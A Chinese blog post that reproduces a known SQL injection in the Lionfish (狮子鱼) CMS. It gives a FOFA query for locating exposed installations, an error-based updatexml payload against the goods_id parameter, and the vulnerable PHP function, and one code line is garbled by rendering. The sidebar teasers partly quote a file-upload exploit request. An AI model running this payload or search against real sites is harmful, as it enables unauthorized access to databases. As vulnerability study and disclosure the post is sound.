狮子鱼SQL注入漏洞复现

最新推荐文章于 2024-02-11 08:26:18 发布
最新推荐文章于 2024-02-11 08:26:18 发布
阅读量1.3k 收藏 4
点赞数
分类专栏: 漏洞复现 文章标签: sql 数据库 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45429101/article/details/129732937
版权

狮子鱼cms sql注入漏洞复现

一、前言

狮子鱼CMS是一款管理系统。在 ApiController.class.php处 参数过滤存在不严谨,导致SQL注入漏洞

二、环境搭建与复现

fofa语法: “/seller.php?s=/Public/login”
界面如下 在这里插入图片描述
执行payload:https://www.xxx.com/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)
结果:
在这里插入图片描述漏洞分析:ApiController.class.php

public function goods_detail()
    {
        $goods_id = I('get.goods_id');
        //gallery =>img_url
        //goods goods.goods_desc  goods_name group_price  market_price  sell_count group_number 

        $sql="select g.*,gd.description,gd.summary,gd.tag from ".
        C('DB_PREFIX')."goods g,".C('DB_PREFIX')."goods_description gd where g.goods_id=gd.goods_id and g.goods_id=".$goods_id;

        $goods_arr=M()->query($sql);

        $qian=array("\r\n");
        $hou=array("<br/>");
        $goods_arr[0]['summary'] = str_replace($qian,$hou,$goods_arr[0]['summary']); 

        $sql="select image from ".C('DB_PREFIX')."goods_image where goods_id=".$goods_id;
        $goods_image=M()->query($sql);

        $gallery = array();
        $default_image = '';
        foreach($goods_image as $val)
        {
            $val['img_url'] = str_replace('http','https',C('SITE_URL')).'/Uploads/image/'.$val['image'];

            if(empty($default_image))
            {
                $default_image = str_replace('http','https',C('SITE_URL')).resize($val['image'], C('goods_thumb_width'), C('goods_thumb_height'));
            }

            $gallery[] = array('img_url' => $val['img_url']); 
        }

        $goods = $goods_arr[0];

s q l = " s e l e c t i m a g e f r o m " . C ( ′ D B P R E F I X ′ ) . " g o o d s i m a g e w h e r e g o o d s i d = " . sql="select image from ".C('DB_PREFIX')."goods_image where goods_id=". sql="selectimagefrom".C(DBPREFIX)."goodsimagewheregoodsid=".goods_id;
传参时并没有做过滤,直接拼接导致的sql注入。

修复建议:升级到最新版本

asdnaiol
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
【1day】狮子CMS注入漏洞学习(2个)
记录并分享学习安全的知识点..
07-07 1108
狮子CMS注入漏洞学习
漏洞复现狮子CMS某SQL注入漏洞
晚风不及你
02-09 1276
狮子CMS(Content Management System)是一种网站管理系统,它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面,网站所有者可以方便地进行内容的发布、管理和布局。
狮子社区团购系统CMS任意文件2处上传漏洞
赵一舟的博客
06-09 3504
漏洞复现 FOFA语句 "/seller.php?s=/Public/login" POC1 POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1 Host: xxx.xxx.xxx.xxx Content-Length: 213 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: null Content-Type: mul.
电信OSS规划 2.8_3.系统蓝图
02-28
电信 OSS规划 系统蓝图 电信业务支撑规划之一,内容详见
狮子cms-sql注入漏洞复现
weixin_68647219的博客
09-06 2790
工作发现,狮子cms存在sql注入漏洞,该漏洞是由于狮子CMS ApiController.class.php 参数过滤存在不严谨可能导致SQL注入漏洞
狮子cms-SQL注入
weixin_46663238的博客
10-20 2125
狮子CMS ApiController.class.php 参数过滤存在不严谨,导致SQL注入漏洞 FOFA语法: “/seller.php?s=/Public/login” 后台登录界面 漏洞点:ApiController.class.php public function goods_detail() { $goods_id = I('get.goods_id'); //gallery =>img_url //go...
入侵狮子图像数据集-物体检测
01-10
入侵狮子-物体检测 通过检测入侵的狮子,帮助拯救本地加勒比物种! 该数据集由565张图像组成,标记为YOLOv5格式的边界框,并分成训练/评估/测试桶进行对象检测。
狮子老虎动物园管理网页模板
01-22
狮子老虎动物园管理网页模板是一款专为动物园管理设计的网页模板,旨在提供一个高效、美观且易用的在线平台,帮助管理员轻松管理动物园内的各种信息,包括动物信息、活动公告、参观指南等。这款模板以其独特的设计...
卡通狮子设计矢量素材
07-25
"卡通狮子设计矢量素材"是一个专为设计师们准备的资源包,它包含了适用于卡通狮子设计的高质量图形元素。这个资源包采用AI(Adobe Illustrator)格式,是Adobe公司的专业矢量图形设计软件所支持的文件类型。AI格式的...
狮子乌贼和鲨flash动画
07-24
狮子乌贼与鲨:探索海洋生物的互动与生态》 在幼教领域,生动有趣的教学资源往往能激发孩子们对知识的热爱和探索欲望。"狮子乌贼和鲨flash动画"就是这样一款专为幼儿园设计的科学课件,旨在通过动画的形式,...
漏洞复现狮子CMS文件上传漏洞(image_upload.php)
最新发布
晚风不及你
02-11 1589
狮子CMS(Content Management System)是一种网站管理系统,它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面,网站所有者可以方便地进行内容的发布、管理和布局。
靶场上新:狮子CMS前台SQL注入
2301_80115097的博客
10-30 202
狮子CMS ApiController.class.php 因参数过滤存在不严谨,导致SQL注入漏洞。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。狮子CMS是以小程序为载体,快速搭建社区社群社交资源的社区团购平台,用于帮助商家集中运营管理。所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,(私聊进群一起学习,共同进步)帮助你在面试中脱颖而出。
SQL注入漏洞复现:探索不同类型的注入攻击方法
weixin_43263566的博客
08-26 1195
基于错误的注入(Error-based Injection):攻击者通过构造恶意的SQL语句,利用应用程序返回的错误信息来获取数据库中的敏感信息。基于联合查询的注入(Union-based Injection):攻击者通过在注入点处构造特殊的SQL语句,利用UNION命令将其他查询结果合并到原始查询中,从而获取额外的数据。基于时间延迟的注入(Time-based Injection):攻击者通过在注入点处构造特殊的SQL语句,
漏洞复现狮子任意文件上传漏洞
失心少年
12-05 1003
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!它具有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。此外,狮子CMS还具有强大的模板和主题系统,用户可以根据自己的需求和喜好选择合适的模板和主题来定制网站的外观和风格。该上传点位返回上传文件名及路径,大家可自行本地搭建,尝试获取上传的文件路径。
SQL注入
m0_75178803的博客
03-02 339
sql数据库注入的一些知识点
漏洞复现狮子CMS文件上传漏洞(wxapp.php)
晚风不及你
02-11 1344
狮子CMS(Content Management System)是一种网站管理系统,它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面,网站所有者可以方便地进行内容的发布、管理和布局。
狮子CMS image_upload.php 任意文件上传
孤桜懶契
03-29 4413
漏洞描述 网站系统为狮子社区团购系统,网上用的也比较多,我fofa上搜了一下,大概有6-7千多。主要用户各种购物,本文主要介绍其中两个文件上传漏洞漏洞复现以及漏洞工具分享。 漏洞影响 s ✅狮子CMS 空间测绘 d ⭕FOFA:"/seller.php?s=/Public/login" 漏洞复现 POC POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1 Host: ip Content-Type
漏洞复现狮子CMS某SQL注入漏洞01
晚风不及你
02-09 1129
狮子CMS(Content Management System)是一种网站管理系统,它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面,网站所有者可以方便地进行内容的发布、管理和布局。
狮子社区团购小程序v17.7
07-02
狮子社区团购小程序v17.7是一款功能强大、便捷实用的团购平台。此小程序通过与社区居民的绑定,为用户提供了丰富的社区生活服务。 首先,狮子社区团购小程序v17.7具有便捷的购物功能。用户可以通过小程序直接...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

asdnaiol

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值